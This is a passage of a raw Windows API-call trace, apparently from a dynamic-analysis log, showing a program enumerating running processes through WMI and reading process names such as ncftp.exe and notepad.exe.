[3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.205] WbemDefPath:IUnknown:Release (This=0x5528550) returned 0x3 [0265.205] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0265.205] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0265.205] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a008, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.205] WbemDefPath:IUnknown:Release (This=0x552a008) returned 0x2 [0265.205] WbemDefPath:IUnknown:Release (This=0x552a008) returned 0x1 [0265.205] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0265.205] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0265.205] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a008, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x552a008) returned 0x0 [0265.205] WbemDefPath:IUnknown:AddRef (This=0x552a008) returned 0x3 [0265.205] WbemDefPath:IUnknown:Release (This=0x552a008) returned 0x2 [0265.205] WbemDefPath:IWbemPath:SetText (This=0x552a008, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"2116\"") returned 0x0 [0265.205] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.206] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.206] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.206] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.206] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.206] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.206] IWbemClassObject:Get (in: This=0x551fc00, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23dac6c*=0, plFlavor=0x23dac70*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ncftp.exe", varVal2=0x0), pType=0x23dac6c*=8, plFlavor=0x23dac70*=0) returned 0x0 [0265.206] SysStringByteLen (bstr="ncftp.exe") returned 0x12 [0265.206] SysStringByteLen (bstr="ncftp.exe") returned 0x12 [0265.206] IWbemClassObject:Get (in: This=0x551fc00, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23dac6c*=8, plFlavor=0x23dac70*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ncftp.exe", varVal2=0x0), pType=0x23dac6c*=8, plFlavor=0x23dac70*=0) returned 0x0 [0265.206] SysStringByteLen (bstr="ncftp.exe") returned 0x12 [0265.206] SysStringByteLen (bstr="ncftp.exe") returned 0x12 [0265.206] CoTaskMemAlloc (cb=0x4) returned 0x54ba2c8 [0265.207] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2c8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2c8*=0x5520728, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.207] IUnknown:QueryInterface (in: This=0x5520728, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x5520728) returned 0x0 [0265.208] IUnknown:QueryInterface (in: This=0x5520728, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.208] IUnknown:QueryInterface (in: This=0x5520728, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.208] IUnknown:QueryInterface (in: This=0x5520728, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.208] IUnknown:AddRef (This=0x5520728) returned 0x3 [0265.208] IUnknown:QueryInterface (in: This=0x5520728, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.208] IUnknown:QueryInterface (in: This=0x5520728, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.208] IUnknown:QueryInterface (in: This=0x5520728, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x552072c) returned 0x0 [0265.208] IMarshal:GetUnmarshalClass (in: This=0x552072c, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.208] IUnknown:Release (This=0x552072c) returned 0x3 [0265.208] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0265.208] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0265.208] IUnknown:QueryInterface (in: This=0x5520728, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.209] IUnknown:Release (This=0x5520728) returned 0x2 [0265.209] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0265.209] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0265.209] IUnknown:QueryInterface (in: This=0x5520728, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x5520728) returned 0x0 [0265.209] IUnknown:AddRef (This=0x5520728) returned 0x4 [0265.209] IUnknown:Release (This=0x5520728) returned 0x3 [0265.209] IUnknown:Release (This=0x5520728) returned 0x2 [0265.209] CoTaskMemFree (pv=0x54ba2c8) [0265.209] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0265.209] IUnknown:AddRef (This=0x5520728) returned 0x3 [0265.209] IWbemClassObject:Get (in: This=0x5520728, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.209] IWbemClassObject:Get (in: This=0x5520728, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3204\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.209] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3204\"") returned 0x5e [0265.209] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3204\"") returned 0x5e [0265.209] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.210] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.210] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.210] IUnknown:Release (This=0x601a94) returned 0x1 [0265.211] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba2c8) returned 0x0 [0265.211] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba2c8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.211] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba2c8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x552a938) returned 0x0 [0265.211] WbemDefPath:IUnknown:Release (This=0x54ba2c8) returned 0x0 [0265.211] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a938, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x552a938) returned 0x0 [0265.211] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a938, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.211] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a938, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.212] WbemDefPath:IUnknown:AddRef (This=0x552a938) returned 0x3 [0265.212] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a938, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.212] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a938, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.212] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a938, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5528850) returned 0x0 [0265.212] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5528850, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.212] WbemDefPath:IUnknown:Release (This=0x5528850) returned 0x3 [0265.212] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0265.212] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0265.212] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a938, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.212] WbemDefPath:IUnknown:Release (This=0x552a938) returned 0x2 [0265.212] WbemDefPath:IUnknown:Release (This=0x552a938) returned 0x1 [0265.212] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0265.213] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0265.213] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a938, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x552a938) returned 0x0 [0265.213] WbemDefPath:IUnknown:AddRef (This=0x552a938) returned 0x3 [0265.213] WbemDefPath:IUnknown:Release (This=0x552a938) returned 0x2 [0265.213] WbemDefPath:IWbemPath:SetText (This=0x552a938, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3204\"") returned 0x0 [0265.213] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.213] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.213] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.213] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.213] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.213] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.213] IWbemClassObject:Get (in: This=0x5520728, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23db4f0*=0, plFlavor=0x23db4f4*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="notepad.exe", varVal2=0x0), pType=0x23db4f0*=8, plFlavor=0x23db4f4*=0) returned 0x0 [0265.213] SysStringByteLen (bstr="notepad.exe") returned 0x16 [0265.213] SysStringByteLen (bstr="notepad.exe") returned 0x16 [0265.213] IWbemClassObject:Get (in: This=0x5520728, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23db4f0*=8, plFlavor=0x23db4f4*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="notepad.exe", varVal2=0x0), pType=0x23db4f0*=8, plFlavor=0x23db4f4*=0) returned 0x0 [0265.213] SysStringByteLen (bstr="notepad.exe") returned 0x16 [0265.214] SysStringByteLen (bstr="notepad.exe") returned 0x16 [0265.214] CoTaskMemAlloc (cb=0x4) returned 0x54ba2c8 [0265.214] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2c8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2c8*=0x55208c0, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.214] IUnknown:QueryInterface (in: This=0x55208c0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x55208c0) returned 0x0 [0265.215] IUnknown:QueryInterface (in: This=0x55208c0, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.215] IUnknown:QueryInterface (in: This=0x55208c0, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.215] IUnknown:QueryInterface (in: This=0x55208c0, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.215] IUnknown:AddRef (This=0x55208c0) returned 0x3 [0265.215] IUnknown:QueryInterface (in: This=0x55208c0, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.215] IUnknown:QueryInterface (in: This=0x55208c0, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.215] IUnknown:QueryInterface (in: This=0x55208c0, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x55208c4) returned 0x0 [0265.215] IMarshal:GetUnmarshalClass (in: This=0x55208c4, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.215] IUnknown:Release (This=0x55208c4) returned 0x3 [0265.215] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0265.215] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0265.215] IUnknown:QueryInterface (in: This=0x55208c0, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.215] IUnknown:Release (This=0x55208c0) returned 0x2 [0265.215] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0265.215] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0265.215] IUnknown:QueryInterface (in: This=0x55208c0, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x55208c0) returned 0x0 [0265.215] IUnknown:AddRef (This=0x55208c0) returned 0x4 [0265.215] IUnknown:Release (This=0x55208c0) returned 0x3 [0265.216] IUnknown:Release (This=0x55208c0) returned 0x2 [0265.216] CoTaskMemFree (pv=0x54ba2c8) [0265.216] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0265.216] IUnknown:AddRef (This=0x55208c0) returned 0x3 [0265.216] IWbemClassObject:Get (in: This=0x55208c0, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.216] IWbemClassObject:Get (in: This=0x55208c0, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1900\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.216] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1900\"") returned 0x5e [0265.216] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1900\"") returned 0x5e [0265.216] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.216] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.216] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.216] IUnknown:Release (This=0x601a94) returned 0x1 [0265.217] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba398) returned 0x0 [0265.218] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba398, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.218] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba398, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x552a2a8) returned 0x0 [0265.218] WbemDefPath:IUnknown:Release (This=0x54ba398) returned 0x0 [0265.218] 